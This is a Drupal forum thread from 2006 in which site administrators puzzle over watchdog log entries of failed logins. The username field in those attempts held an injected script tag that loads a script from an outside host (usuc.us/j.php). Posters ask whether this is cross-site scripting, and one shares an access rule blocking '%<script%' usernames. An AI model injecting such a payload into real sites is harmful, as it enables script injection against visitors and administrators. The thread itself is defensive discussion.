Support for Drupal 7 is ending on 5 January 2025—it’s time to migrate to Drupal 10! Learn about the many benefits of Drupal 10 and find migration tools in our resource center.
By Muslim guy on
*Login attempt failed for <script src=http://usuc.us/j.php*
There were 5 times the watchdog logged this attempt on our site.
Is this what you call `Cross Site Scripting' (XSS)?
How serious or dangerous is this kind of attempt, and how to block further attempts?
*Details:
Message Login attempt failed for <script src=http://usuc.us/j.php>jonny</script>: Sorry. Unrecognized username or password. <a href="user/password">Have you forgotten your password?</a>.
Severity notice
Hostname 72.237.26.86
Comments
Details of php attempt
*Login attempt failed for "script src=http://usuc.us/j.php*
There were 5 times the watchdog logged this attempt on our site.
Is this what you call `Cross Site Scripting' (XSS)?
How serious or dangerous is this kind of attempt, and how to block further attempts?
*Sorry I forgot to truncate the code
They seem to be trying to do
They seem to be trying to do that, however, it seems that it failed.
details of php attempt
I have the same attempt logged twice by the watchdog, it was blocked but I guess its only a matter of time before they find a way to hack their way in.
Type user
jonnyDate Saturday, November 18, 2006 - 3:22pm
User Visitor
Message Login attempt failed for
.
Severity notice
Hostname 70.84.128.116
Me too
With the exact same domain, & username. (though across several IPs).
I added the following access rule--probably a feable attempt at blocking it, but . . .
%<script%